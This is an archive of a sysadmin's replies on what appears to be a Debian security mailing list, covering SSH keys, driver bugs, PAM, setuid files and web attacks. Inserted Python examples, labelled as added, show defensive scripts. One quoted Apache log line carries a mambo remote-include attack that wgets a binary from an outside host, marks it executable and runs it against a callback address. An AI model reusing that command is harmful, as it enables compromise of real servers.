Re: Is oldstable security support duration something to be proud of?

2008-03-10 Thread Michael Loftis



--On March 10, 2008 4:33:53 PM -0400 Filipus Klutiero <[EMAIL PROTECTED]> wrote:

> Argh. If I'm asking about a statement, that's because I read it.
> Obviously, the author didn't bother checking whether he was right, which
> is why I'm asking whether there are some people that disagree.

Actually it's you who are mistaken I believe.  Since Sarge has been out
since about 2005.  That's better than Fedora Core, at least as good as
Ubuntu LTS (not to be confused with Ubuntu) and openSUSE.  It's not as good
as RHEL, but that's not a fair comparison since RHEL is not free.  CentOS
may be a fair comparison but I don't know their precise policies.

>> Why do you perceive that
>> they shouldn't be proud?  Where is your basis that they don't deserve
>> to be proud?
>
> I already explained this in the bug report.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Kernel upgrade for 3Ware Driver issues?

2008-04-21 Thread Michael Loftis
The 2.6.18-6 kernel has a buggy 3w- driver.  Causes data corruption on 
(at least) EM64T w/ 4+GB of RAM.  I'm also pretty sure it's the cause of 
corruption on EM64T systems in 32-bit mode even w/o 4+GB of RAM. 
Specifically it affects 7xxx and 8xxx series cards.






In any event this is a pretty serious bug affecting a pretty large number 
of systems, more than what 3Ware seems to be admitting, so is there any 
plan to issue an update?  I have a number of systems affected by the bug. 
Some I'm holding off upgrading to Debian 4.0 (from 3.1) because the bug 
isn't present in 2.6.8.



--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler





Re: Kernel upgrade for 3Ware Driver issues?

2008-04-22 Thread Michael Loftis



--On April 22, 2008 11:21:25 PM +0200 Florian Weimer <[EMAIL PROTECTED]> wrote:

> I guess the number of systems with amd64 and a 3ware 7xxx/8 PATA
> controllers is pretty small, otherwise this bug would have been noticed
> earlier.  So the sky is not falling.
>
> Technically, this is not a security bug.

It definitely affects non-64bit systems too, contrary to 3Ware's claims.
We had corruption on a 32bit system, which is what prompted us to start
figuring it out.

And I agree, technically it isn't, but security is one of the few ways to
get updates into the distribution that are NMU.







Re: openssh lockup after blacklist hits

2008-05-20 Thread Michael Loftis

MaxStartups.

--On May 20, 2008 4:15:33 PM +1000 CaT <[EMAIL PROTECTED]> wrote:

> I got connections from an unknown IP to openssh today. openssh logged:
>
> Public key ... blacklisted (see ssh-vulnkey(1))
>
> 19 times, each time with a different key and then ssh would not respond
> any more and connections to it froze like so:
>
> $ ssh [EMAIL PROTECTED] -v
> OpenSSH_4.3p2 Debian-9etch1, OpenSSL 0.9.8c 05 Sep 2006
> debug1: Reading configuration data /home/.../.ssh/config
> debug1: Reading configuration data /etc/ssh/ssh_config
> debug1: Applying options for *
> debug1: Connecting to ... [...] port 22.
> debug1: Connection established.
> debug1: identity file /home/.../.ssh/identity type -1
> debug1: identity file /home/.../.ssh/id_rsa type 1
> debug1: identity file /home/.../.ssh/id_dsa type -1
> ssh_exchange_identification: Connection closed by remote host
>
> Admittedly, not running etch2 but there's nothing in the changelog that
> deals with this so I don't think that would've helped.
>
> This is running on a 64bit intel box.
>
> --
>   "Police noticed some rustling sounds from Linn's bottom area
>   and on closer inspection a roll of cash was found protruding
>   from Linn's anus, the full amount of cash taken in the robbery."
> -
> http://www.smh.com.au/news/world/robber-hides-loot-up-his-booty/2008/05/09/1210131248617.html





Re: [ SPAM! ] [SECURITY] [DSA 1594-1] New imlib2 packages fix arbitrary code execution

2008-06-11 Thread Michael Loftis



--On June 11, 2008 10:44:02 PM +0200 [EMAIL PROTECTED] wrote:

> Hello
>
> I am away until 16 June.
> You can send your requests to [EMAIL PROTECTED]
>
>
> I am out of the office until June the 16th.
> You can send your request to [EMAIL PROTECTED]

I'm not sure what is worse here.  The fact the autobot responded to the
list, or the fact that it responded to something that had been identified
as SPAM.








Re: Mass-updating cached host keys after ssh security upgrade?

2008-07-21 Thread Michael Loftis

ssh-keyscan

--On July 21, 2008 6:43:31 PM -0500 JW <[EMAIL PROTECTED]> wrote:

> Hello,
>
> In the past several weeks I have applied the openssh/openssl updates to
> my systems - the updates that fix the random-number-generator weakness.
>
> This has turned into an unexpected nightmare: my users have, between them
> all, dozens of cached host keys, and they are nearly unable to work
> because every time they turn around they're getting bad-old-cached-key
> warnings (REMOTE HOST IDENTIFICATION HAS CHANGED).
>
> I've been trying to go through all the known_hosts files manually and
> update them to give my users a break, but it's a tedious nightmare.
> Adding to the complexity is that many of the known_hosts files are
> armored (the hostname/ip address is not in plain text).
>
> Has anyone come up with a way to read all the cached hosts - all the
> ~/.ssh/known_hosts entries on a system (or at least per user) and fix
> them?
>
> Essentially I need some semi-automated way to fix this since I have many
> users' connections to fix still (hundreds if not thousands by the time I
> do machines X users X outgoing connections).
>
> Thanks,
>
> JW


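An added example, not code from the thread: OpenSSH's HashKnownHosts option (the "armored" form described above) writes the host field as |1|salt|HMAC-SHA1(salt, hostname), so a script can still find which lines of a known_hosts file cache a key for a host that was regenerated by recomputing the HMAC with each line's own salt, then drop and re-fetch those entries with ssh-keygen -R and ssh-keyscan. The sample file, host names and the refresh_host() wrapper are constructed here.

```python
"""Locate and refresh stale host keys in (hashed) known_hosts files.

Added example, not from the thread. Assumes OpenSSH's HashKnownHosts
format: the host field is |1|<base64 salt>|<base64 HMAC-SHA1(salt, host)>.
The sample file, host names and refresh_host() wrapper are constructed.
"""
import base64
import hashlib
import hmac
import subprocess
from typing import Dict, List, Tuple


def hash_host(hostname: str, salt: bytes) -> str:
    """Hashed host field exactly as ssh-keygen -H / HashKnownHosts writes it."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def host_matches(field: str, hostname: str) -> bool:
    """Does a known_hosts host field (plain, comma-separated or hashed) name hostname?

    Wildcard (*) and negation (!) patterns are not handled; hosts on a
    non-default port are stored as "[host]:port" and must be passed that way.
    """
    if field.startswith("|1|"):
        try:
            _, _, salt_b64, _mac_b64 = field.split("|", 3)
            salt = base64.b64decode(salt_b64, validate=True)
        except ValueError:          # malformed field: not a match, not an error
            return False
        # Recompute the HMAC with the line's own salt and compare whole fields.
        return hash_host(hostname, salt) == field
    return hostname in field.split(",")


def find_entries(known_hosts_text: str, hostname: str) -> List[Tuple[int, str]]:
    """(line number, key type) for every line that caches a key for hostname."""
    hits = []
    for lineno, raw in enumerate(known_hosts_text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0].startswith("@"):   # @cert-authority / @revoked marker
            parts = parts[1:]
        if len(parts) >= 3 and host_matches(parts[0], hostname):
            hits.append((lineno, parts[1]))
    return hits


def stale_entries(known_hosts_text: str, regenerated: List[str]) -> Dict[str, List[int]]:
    """Map each host whose key was regenerated to the line numbers still caching it."""
    result = {}
    for host in regenerated:
        lines = [n for n, _ in find_entries(known_hosts_text, host)]
        if lines:
            result[host] = lines
    return result


def refresh_host(known_hosts_path: str, hostname: str) -> None:
    """Drop every cached key for hostname and re-fetch the current one.

    Hypothetical wrapper around two real OpenSSH tools: ssh-keygen -R
    removes matching lines (hashed ones too) and ssh-keyscan -H appends the
    key it sees, in hashed form. ssh-keyscan trusts whatever answers, so
    compare the fingerprint out of band before users rely on it. Not run
    by the self-checks.
    """
    subprocess.run(["ssh-keygen", "-R", hostname, "-f", known_hosts_path], check=True)
    with open(known_hosts_path, "a") as fh:
        subprocess.run(["ssh-keyscan", "-H", hostname], stdout=fh, check=True)


# Constructed sample: one plain entry, two hashed ones, one revoked marker.
# The salt is fixed only so the sample is reproducible; ssh uses random salts.
_SALT = bytes(range(20))
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample; key blobs are placeholders",
    "web.example.org,192.0.2.10 ssh-rsa AAAAB3PLACEHOLDER1",
    hash_host("build.example.org", _SALT) + " ssh-rsa AAAAB3PLACEHOLDER2",
    hash_host("db.example.org", _SALT) + " ssh-dss AAAAB3PLACEHOLDER3",
    "@revoked " + hash_host("old.example.org", _SALT) + " ssh-rsa AAAAB3PLACEHOLDER4",
])

if __name__ == "__main__":
    regenerated = ["build.example.org", "db.example.org", "nowhere.example.org"]
    for host, lines in stale_entries(SAMPLE_KNOWN_HOSTS, regenerated).items():
        print("%s: still cached on line(s) %s" % (host, lines))
```

Run over each user's ~/.ssh/known_hosts with the list of hosts whose keys were regenerated, the stale_entries() output is the per-user work list; refresh_host() then replaces one entry at a time.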



Re: Apache "DDOS" with random number request

2008-09-21 Thread Michael Loftis
It sounds like your app, or a combination of the modules you're using is
more likely what's running Apache out of memory.  mod_security could be
used to check for requests that contain just a numeric path to GET, but I'd
investigate why your app/configuration is causing an OOM error.  Could it
be you've got MaxClients set too high and the clients are holding
connections open after the fact?

There are many possibilities at this point, many of which (most) have
nothing to do with apache but with local configuration and options.


--On September 22, 2008 12:08:39 AM +0200 NeMiX <[EMAIL PROTECTED]> wrote:

> Hi there,
>
> since last week we've got a little problem with our web server farm.
>
> We get some strange requests from some dial-up accounts from Europe
> (T-Online; Telefonica; Orange...):
>
> Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid URI in request GET 347905 HTTP/1.0
> Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid URI in request GET 341922 HTTP/1.0
>
> This strange request (GET 347905 HTTP/1.0) passes our firewall (because
> it's normal HTTP), goes to our load balancer and then to our web server.
>
> Only one client makes about 80-100 strange requests per minute and we get a
> peak on our web server farm and finally after 5 minutes the web server(s)
> run out of memory:
>
> Out of Memory: Kill process 12082 (apache) score 199722 and children.
> Out of memory: Killed process 19435 (apache).
>
> If we get a "DDOS" we make a tcpdump and count the IPs (maximum 8 dial-up
> accounts) to block them on our firewall.
>
> I don't find anything about this strange request on Google or some security
> boards.
>
> Is this a new kind of DDOS or just kiddy stuff? If someone has some more
> information about this strange request/DDOS it would be very nice if he
> could send this to me.
>
> Kind Regards
>
> --
> Andre Braun, IT Manager
> Turtle Entertainment GmbH

--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


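An added example, not part of the thread: detection logic over constructed syslog-relayed Apache error_log lines of the shape quoted above, bucketing "Invalid URI in request GET <number>" entries by client and minute so that a source running at the 80-100 requests per minute the report describes stands out, and unrelated error lines are ignored. The addresses (192.0.2.0/24) and the threshold are constructed.

```python
"""Detect bursts of bare-numeric request lines in Apache error_log output.

Added example, not from the thread. Parses syslog-relayed error_log lines
of the shape quoted in the report and counts, per client and minute, the
"Invalid URI in request GET <number>" entries. Sample lines, addresses
(192.0.2.0/24, documentation space) and the threshold are constructed.
"""
import re
import sys
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

INVALID_URI_RE = re.compile(
    r"^(?P<minute>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}):\d{2} .*?"
    r"\[error\] \[client (?P<client>[^\]]+)\] "
    r"Invalid URI in request (?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$"
)


def parse_invalid_uri(line: str) -> Optional[Dict[str, str]]:
    """Fields of an 'Invalid URI in request' line, or None for any other error line."""
    m = INVALID_URI_RE.match(line)
    return m.groupdict() if m else None


def is_bare_number(target: str) -> bool:
    """True for request targets like '347905': digits only, no leading slash."""
    return target.isdigit()


def find_bursts(lines: List[str], threshold: int = 80) -> List[Tuple[str, str, int]]:
    """(client, minute, count) for clients with >= threshold bare-numeric invalid URIs in a minute.

    Worst offender first; this is the client list the report's authors were
    deriving from tcpdump before blocking at the firewall.
    """
    counts: Dict[Tuple[str, str], int] = defaultdict(int)
    for line in lines:
        rec = parse_invalid_uri(line)
        if rec and is_bare_number(rec["target"]):
            counts[(rec["client"], rec["minute"])] += 1
    hits = [(client, minute, n) for (client, minute), n in counts.items() if n >= threshold]
    return sorted(hits, key=lambda h: (-h[2], h[0]))


def _line(hhmm: str, sec: int, client: str, target: str) -> str:
    """Constructed syslog-relayed error_log line in the quoted format."""
    return ("Sep 21 %s:%02d logger: [Sun Sep 21 %s:%02d 2008] [error] [client %s] "
            "Invalid URI in request GET %s HTTP/1.0" % (hhmm, sec, hhmm, sec, client, target))


SAMPLE_LOG: List[str] = (
    [_line("22:47", s % 60, "192.0.2.44", str(340000 + s)) for s in range(90)]  # the burst
    + [_line("22:48", s, "192.0.2.7", str(1000 + s)) for s in range(3)]         # a trickle
    + [_line("22:48", 30, "192.0.2.7", "foo")]                                   # invalid, not numeric
    + ["Sep 21 22:48:31 logger: [Sun Sep 21 22:48:31 2008] [error] [client 192.0.2.9] "
       "File does not exist: /var/www/favicon.ico"]                              # unrelated error
)

if __name__ == "__main__":
    # Feed real lines on stdin (e.g. from the syslog file); falls back to the sample.
    source = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_LOG
    for client, minute, n in find_bursts(source):
        print("%s  %-18s %d bare-numeric requests" % (minute, client, n))
```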



Re: antivirus for webserver

2008-10-06 Thread Michael Loftis
Don't forget about the box, make sure to keep it upgraded regularly as 
security updates come out.  Also make sure to upgrade it to the latest 
distribution of Debian as those come out because older distributions only 
have limited security support, and are eventually dropped altogether from 
security.  Running AV software on a Linux/Unix is generally done to try to 
find virii infecting windows machines being stored on your host.


Also be careful when you're using third party php apps, or even writing 
your own, as those are usually the source of exploits/hacks on Linux 
webservers.  If you can, turn off url_fopen at least, that helps a LOT.


--On October 6, 2008 10:10:33 AM +0200 Laura Arjona Reina <[EMAIL PROTECTED]> wrote:

> Hello
> I have a debian etch webserver, it only has installed
> ssh+apache+php+mysql.
> It has no GUI.
> Nobody sits or connects there to work, only administrators for backing up
> and updating the system.
> I tried to secure it by installing and configuring bastille.
> Now the only open ports are 22 for ssh and 80 for apache.
> We don't need any other service: no DNS, no email server, no ldap, just
> webserver.
> The connections to mysql are closed from outside, only the webserver can
> access mysql databases.
>
> My question is whether it is necessary to install an antivirus to keep the
> webserver safe. And if it is needed, which antivirus could I use?
> I thought about clamav but I read about problems keeping the software
> shipped with etch-stable up to date.
>
> Thank you
>
> Laura Arjona









Re: basically security of linux

2009-01-16 Thread Michael Loftis



--On January 16, 2009 10:31:35 AM +0100 Andreas Matthus wrote:

> Hello,
>
> I manage a lot of debian servers and try to install the updates often.
> So I had in mind my systems are well prepared. (I follow also other
> security rules  ;-)  )
>
> But since some days I mull over a question: What happens if a user runs
> a selfcopy from a program with a security hole? I'm afraid he can get
> root-rights. Isn't it?

In general, no.  This requires an exploitable kernel bug.  That said, there
have been some of these in the past, and new ones will likely be discovered
in the future, but that's far more rare.  Anything you run as root should
only ever come from trusted sources for this reason.

Windows is a different matter.  There's so many ways to break local
security on windows it's not funny.  But with Linux, and any Unix in
general, you can not arbitrarily escalate your privileges.  The way
applications like su, and sudo work is through the SetUID bit on their
executable.  What this does is cause the kernel to run the application as
the user that owns the file - root in the case of su and sudo - this lets
them elevate your privilege levels if you pass their access checks.  That's
why SetUID executables can be dangerous.  You have to trust them.  Very few
programs are SetUID 0/root.

Linux/UNIX was designed for running arbitrary programs by arbitrary users,
and keeping them all separate from each other, secure from each other's
malicious intent or accidents, provided you follow secure permissions on
files and directories.

root is the only user who has exceptions to this, root has the capability
to read or write any file (I know I know guys there's SELinux and stuff
like that for CAP management but we're talking the general case here).







Re: basically security of linux

2009-01-16 Thread Michael Loftis



--On January 16, 2009 7:29:13 PM +0100 Johannes Wiedersich wrote:

> Boyd Stephen Smith Jr. wrote:
>
>> What about hardlinking the suid-root binaries to a hidden location,
>> waiting for a security hole to be found/fixed, and then running the old
>> binary to exploit the hole?

This is why compromised systems can't be trusted ever again.  That said,
there are utilities and methods for finding rogue SUID binaries.  Tripwire
comes to mind, there are many others too.

> IIRC, a hard link is the same file called two different names. If
> dpkg/apt change the file in one location (security update), the other
> one will be changed as well [1]...

That only holds true of edit-in-place.  Something that most packaging
systems do not do, the reason being is that with the way modern
systems/kernels execute code, this would modify running code (They
generally mmap the code, readonly, into the process's address space).

FreeBSD at least IIRC prevents this, Text File Busy/Text File In Use error.
However, you can't create a hard link on a file you don't own, you can't do
it across drives, and I don't think your hardlinked copy retains SUID
bits... The last bit I could be wrong though.

> You'd have to *copy* the hard linked file, but that would still not
> allow you to copy it back later or to retain its suid properties.
>
> Am I missing something?
>
> Johannes
>
> [1] http://en.wikipedia.org/wiki/Hard_link
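An added example, not code from either post above: a sweep that lists setuid files owned by a chosen uid and separately reports the ones with more than one hard link (another name for the same inode, which is what the retained-copy scenario in the quoted question would leave behind) and the ones missing from a known-good baseline, the job the Tripwire reference points at. The demo tree is constructed under a temporary directory and the uid is a parameter so it runs unprivileged.

```python
"""Sweep a tree for setuid files and flag multiply-linked or unknown ones.

Added example, not from either post. Reports every regular file with the
setuid bit owned by a given uid, then the subset with more than one hard
link (a link is another name for the same inode, so the bit travels with
it) and the subset not on a known-good list. The demo tree is constructed
in a temporary directory and the uid is a parameter so it runs unprivileged.
"""
import os
import shutil
import stat
import sys
import tempfile
from typing import Dict, Iterable, Iterator, List, NamedTuple, Set


class SetuidFile(NamedTuple):
    path: str
    uid: int
    nlink: int
    mode: int


def iter_setuid(root: str, owner_uid: int = 0, same_fs: bool = True) -> Iterator[SetuidFile]:
    """Yield regular files under root with the setuid bit set and owned by owner_uid.

    Symlinks are not followed. With same_fs the walk stays on root's
    filesystem; since a hard link cannot cross filesystems, one sweep per
    mount point sees every name an inode has.
    """
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        if same_fs:
            keep = []
            for d in dirnames:
                try:
                    if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev:
                        keep.append(d)
                except OSError:
                    pass
            dirnames[:] = keep
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
                yield SetuidFile(path, st.st_uid, st.st_nlink, st.st_mode)


def multiply_linked(files: Iterable[SetuidFile]) -> List[SetuidFile]:
    """Setuid files whose inode has more than one name.

    A package upgrade that installs by rename leaves the old inode alive
    under any extra name, so each hit deserves a look; a few packages do
    ship hard-linked setuid binaries legitimately, so treat hits as leads.
    """
    return [f for f in files if f.nlink > 1]


def not_in_baseline(files: Iterable[SetuidFile], baseline: Set[str]) -> List[SetuidFile]:
    """Setuid files at paths absent from a known-good list recorded on a clean system."""
    return [f for f in files if f.path not in baseline]


def demo() -> Dict[str, List[str]]:
    """Build a constructed tree, sweep it, and return relative paths per finding."""
    root = tempfile.mkdtemp(prefix="setuid-sweep-")
    try:
        bin_dir, hidden = os.path.join(root, "bin"), os.path.join(root, "hidden")
        os.makedirs(bin_dir)
        os.makedirs(hidden)
        for name, mode in (("su", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
            path = os.path.join(bin_dir, name)
            with open(path, "wb") as fh:
                fh.write(b"#!/bin/sh\n")   # placeholder content, never executed
            os.chmod(path, mode)
        # The retained copy from the quoted scenario: a second name for bin/su.
        os.link(os.path.join(bin_dir, "su"), os.path.join(hidden, "su.old"))
        baseline = {os.path.join(bin_dir, "su"), os.path.join(bin_dir, "passwd")}
        found = list(iter_setuid(root, owner_uid=os.getuid()))

        def rel(files: Iterable[SetuidFile]) -> List[str]:
            return sorted(os.path.relpath(f.path, root) for f in files)

        return {"setuid": rel(found),
                "linked": rel(multiply_linked(found)),
                "unknown": rel(not_in_baseline(found, baseline))}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr"
    for f in iter_setuid(root):   # real sweep: setuid files owned by root
        print("%o %d %s" % (f.mode & 0o7777, f.nlink, f.path))
```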



Re: suspicious text alteration

2009-02-03 Thread Michael Loftis



--On February 3, 2009 6:38:19 PM + li...@aleblanc.cotse.net wrote:

> Hi,
>    I noticed something very suspicious the other day while using emacs.
>    I'm sure I saw a text character on my screen (far from my cursor or
>    mouse pointer) change to a different character on its own.
>    I have noticed this a couple of times before in the past, but
>    instantly ignored it assuming it was my imagination.
>
>    Here is a list of possibilities I can think of:

Sounds like either bad video ram, or bad ram, or a badly behaved video
driver.  To rule out bad system ram (or if your ram is shared) use
memtest86 or memtest86+, for bad video ram, I'm not sure of anything out
there to test dedicated VRAM.  But if your vram is shared you can try
physically swapping your DIMMs (e.g. move dimm0 to dimm1 and dimm1 to dimm0)
and testing again.  Another possibility is that you've got something in
your case shorting the video bits, or a motherboard failure (there's a
bunch of well documented problems with nvidia and other bga package
systems).

I highly doubt it's anything security related.

> 1) I was hallucinating - it was late, but I did not feel tired,
>    and double checked myself.
> 2) Software error - I was using emacs 22.3. and did not have any
>    modes running that could do something like that.
> 3) Hardware error - the machine had been running for a long time,
>    but is less than one year old. However there is a minor
>    problem - when I alter the screen brightness using the fn key
>    the brightness indicator that appears is usually garbage.
>    Sometimes it appears as normal though.
> 4) Cosmic rays - I have read that computer memory chips can be
>    altered by cosmic ray interference, and that this is not
>    uncommon:
>    http://www.newscientist.com/blog/technology/2008/03/do-we-need-cosmic-ray-alerts-for.html
>    http://news.bbc.co.uk/2/hi/technology/7335322.stm
> 5) Hacker/Root kit - could someone disrupt my workflow by
>    installing a rootkit which subtly alters text? or maybe a
>    hacker is doing it directly? I did have an SVN server & SSH
>    server connected to the internet, and frequently used instant
>    messaging with people I don't know very well.
>
> Can anyone give me advice? Am I being too paranoid? too relaxed?
> Has anyone else had the same problem or heard/read about it?
>
> --
> aleblanc





Re: Missing mail.log files

2009-03-31 Thread Michael Loftis



--On March 31, 2009 10:09:37 AM +0200 "Giacomo A. Catenazzi" wrote:

> Consider also that there are different loggers, different ways to
> implement logs and not a right way to do it, so it is really possible to
> have non-optimal log-rotation scripts.
> I don't use postfix, so I did not investigate if there are bugs.

In debian, nothing logs directly to /var/log/mail.log, everything comes in
via syslog, so only syslogd ever has the file open for writing.  Log
rotation is controlled IIRC by savelog which controls ALL rotation of all
logs for syslogd logs, so if there was a bug in that he should be missing
chunks from everything.

The (most) likely explanation is running out of disk space in /var,
followed by someone (accidentally or not) removing the logs, followed (very
distantly) by some new bug in the log rotation scripts.  I haven't checked
any of my deb5 machines yet, but I've never seen this happen with deb4.
Though running out of space in /var would possibly result in missing other
logs too.  I don't think it was mentioned if the log.N's are sequential or
not.  Or if he has compression in use on them or not.








Re: non-executable stack (via PT_GNU_STACK) not being enforced

2010-10-10 Thread Michael Loftis



--On Sunday, October 10, 2010 9:53 AM -0400 Brchk05 wrote:

> I am running Debian 2.6.26-21lenny4 and I am puzzled by an issue with the
> enforcement of page permissions.  I have written a simple program with a
> basic buffer overflow and compiled two versions using gcc: one with -z
> execstack and another with -z noexecstack.

I could be wrong as I haven't looked at the whole NX/XD thing in detail,
been a while since I've actively done anything of the sort, but, it would
seem to me smashing is not the same as executing on the stack necessarily.
Overwriting/changing returns on the stack via a smash, or clobbering code
via a smash won't be affected by non executable stack, since that's just
changing stack variables, now if your code section is also non-writable,
and your heap is non-executable, you're further protected but you can still
do a return to libc attack.  Wikipedia talks about this








Re: Any Account Logs In With Any Password

2010-10-25 Thread Michael Loftis
Depends on your full stack, but yes, this is the PAM behavior as checks
prior to this indicate a soft success.  If you remove authentication from
your system, it's expected that any attempt to access will pass, barring any
specific denial.

--On Monday, October 25, 2010 17:16 -0400 Brad Tilley wrote:

> While experimenting with PCI DSS on a default Debian Linux system, I
> found that when I comment out this line:
>
> auth    required    pam_unix.so nullok_secure
>
> in /etc/pam.d/common-auth, any account may ssh into the box by typing
> anything as the password. Is this the desired behavior? I would think
> that it would fail by default.






security.debian.org mirrors?

2005-09-21 Thread Michael Loftis
Are there any official mirrors yet?  Esp. mirrors that allow rsync?
security.debian.org has been abysmally slow for at least a month here and
so I'm now forced to set up a local mirror, except I can't rsync the main
mirror at all (max connections limit error message).

Any suggestions?  Yes I searched the archives and can't find anything
relevant.  I know that at least in the past creating one's own mirrors was/is
frowned upon but since the security team doesn't seem to be moving in that
direction I need to.


TIA all,





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Michael Loftis



--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp <[EMAIL PROTECTED]> wrote:

> Hi,
>
> yesterday morning I found a strange entry in my apache log files (debian
> sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> server, just serving my family and some good friends (normally).
>
> ---cut---
> 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
> mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
> 20212.20
> 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
> YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
> Windows NT 5.1;)"
> ---cut---
>
> As I patched mambo against the recent "register globals" attack and my /tmp
> is mounted noexec, the attack doesn't exploit anything.
>
> However, I curiously downloaded this sexy executable to have a closer
> look.
>
> ---cut---
> backup:/home/qmb# ./sexy -h
> ./sexy  
> ---cut---

Firstly, don't ever download and run untrusted code as root, especially
when it's obviously an exploit attempt, unless you run it on an unconnected
box you're prepared to scrap afterwards.  God knows what the code will do
to your system.

> This host backup (sarge, 2.6.12) is in the second row of my LAN and just
> used to make rsync backups of LAN hosts to usb hds.
>
> Unfortunately, I was that curious, that I decided to strace it (although
> I hardly understand strace):
>
> ---cut---
> backup:/home/qmb# strace ./sexy
> execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
> uname({sys="Linux", node="backup", ...}) = 0
> brk(0)  = 0x804a000
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> -1, 0) = 0xb7f13000
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.cache", O_RDONLY)  = 3
> fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
> old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
> close(3)= 0
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/lib/tls/libc.so.6", O_RDONLY)= 3
> read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
> 512) = 512
> fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
> old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
> 0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
> old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
> close(3)= 0
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> -1, 0) = 0xb7dd5000
> set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
> limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
> limit_in_pages:1, seg_not_present:0, useable:1}) = 0
> munmap(0xb7f0b000, 30780)   = 0
> fork()  = 11935
> fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
> mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
> 0) = 0xb7f12000
> write(1, "./sexy  \n", 21./sexy  
> )  = 21
> munmap(0xb7f12000, 4096)= 0
> exit_group(2)   = ?
> ---cut---
>
> After this run the box was badly damaged:
>
> - It insists on bringing its NIC to promiscuous mode
> - ls, grep, gunzip (probably others, too) just give a segmentation
>   fault
>
> I tried to investigate further:
>
> - tcpdump doesn't show any traffic in the net that shouldn't be there
> - ps ax listed only known processes, all were found in /proc, too
> - Top doesn't show anything strange
> - netstat -tulpen doesn't list any ports listening
>
> Trying to reboot failed totally. It tried to run a lot of grep processes
> that didn't run etc.
>
> It took me 2 hours to return to a normal state with this box (booting
> knoppix, backup of corrupted /var, blanking the disc, restoring the
> backup of the night before).
>
> Although I am not that familiar with strace and no coder, I suppose that
> the program "sexy" damaged the linker (open ld.so.cache) and would have
> tried to open a ptty on the IP/port given on the command line (As I did
> not give any command line arguments, this failed). Probably the guy/bot
> on the other end would have exchanged some libs in this session to
> install the real rootkit on the box.
>
> Right?

Not having the binary and not really having time to look at it, it's
probably just straight up attempting to infect your machine, and that it
very clearly succeeded in doing.  It didn't however succeed in hiding
itself, as evidenced by your segfaults.  You're probably running a little
different target OS than 'sexy' was built for.

> Though I already invested some time (restoring the host backup), I would
> be pleased to understand what happened in more detail so any clue is
> appreciated.
>
> If somebody 

Re: PaX on Debian

2006-01-26 Thread Michael Loftis



--On January 26, 2006 11:03:55 AM +0100 "Martin G.H. Minkler" <[EMAIL PROTECTED]> wrote:

> [EMAIL PROTECTED] wrote:
>
>> Can everybody tell me where I can download PaX patch for debian kernel?
>
> Maybe look into a bigger / more complete solution such as
> http://www.grsecurity.net or SELinux?
>
> grsecurity is highly configurable, just use the PaX features if You like

I'd definitely second that opinion.  GRSec is the successor to PaX I
*think* anyway.  SELinux can be a bit daunting to do a 'full' setup though.






Re: Using multicast for security updates

2006-02-23 Thread Michael Loftis
Good idea except this requires large scale rollout of multicast, which
AFAIK, hasn't happened.






Re: Bonk vulnerability!

2006-03-03 Thread Michael Loftis



